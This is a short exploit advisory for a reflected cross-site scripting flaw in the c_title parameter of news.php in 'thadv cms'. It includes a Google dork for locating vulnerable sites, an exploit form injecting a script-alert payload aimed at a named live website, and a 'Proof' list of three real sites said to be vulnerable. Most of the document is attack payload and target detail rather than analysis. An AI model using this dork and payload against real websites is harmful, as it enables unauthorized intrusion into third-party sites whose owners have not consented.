============================================== # Exploit Title : thadv cms Cross-Site Scripting(XSS/Reflected) vulnerability # Reported Date : 8 - 22 - 2017 # Exploit Author : Ashiyane Digital Security Team # Tested On : kali Linux # Vendor Homepage : http://thadv.com # Google Dork : intext:"Website designed by THADV" ============================================== ----------------------------- vulnerability discovered by : sir shahroukh ----------------------------- vulnerability Path : http://Target/news/news.php ----------------------------- vulnerability File: news.php ----------------------------- vulnerability Method : _POST[] ----------------------------- vulnerability Variable: c_title ----------------------------- Vulnerability code : <form method='POST' name='page1' action='news.php? class1=&class2=&class3=&search=& c_title=%5C%5C%5C%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&page=' target='_self'>共<span>0</span>頁 目前第<span>1 </span>頁 轉至第<INPUT size='1' name='page_input'>頁 <input type='submit' name='Submit3' value=' GO ' class='tj'> </form> ----------------------------- Exploit code : <form method='POST' name='page1' action='http://www.renshinkan.tw/news/news.php?class1=&class2= &class3=&search=&c_title='/></title><script>alert(1)</script>&page=' target='_self'>共<span>0</span>頁 目前第<span>1</span> 頁 轉至第<INPUT size='1' name='page_input'>頁 <input type='submit' name='Submit3' value=' GO ' class='tj'> </form> ----------------------------- Proof : http://www.renshinkan.tw/news/news.php http://www.sanna.com.tw/news/news.php http://www.letsgowithlasco.com/news/news.php ==============================================|